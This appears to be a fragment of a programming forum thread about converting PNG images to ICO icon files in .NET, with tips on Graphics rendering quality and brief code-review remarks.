load your png as bitmap and then save it with ImageFormat.Icon option

ive tried that, but it lowers the quality
then you probably will need to use the Graphics Class https://docs.microsoft.com/en-us/dotnet/...work-4.7.2

CompositingMode
Gets a value that specifies how composited images are drawn to this Graphics.

CompositingQuality
Gets or sets the rendering quality of composited images drawn to this Graphics.

InterpolationMode

SmoothingMode
Gets or sets the rendering quality for this Graphics.

Use a web requests. There are plenty of sites on the internet where you can convert PNG to ico. It should be that difficult. GL

because the majority of the questions asked here are rather basic and not even interesting anymore. tbh i’d rather answer questions on stackoverflow.

You're welcome. Hopefully others can find their way here with the same questions and get some answers.

I'm not sure why you would use Encoding.Default here. You've also mixed Dispose() calls with the using statement here, but it seems like a bit of unnecessary/additional code too at first glance..

Adding to my previous answer, here is a way to generate one icon from multiple images (yielding multi-size ico) as used for Windows icons
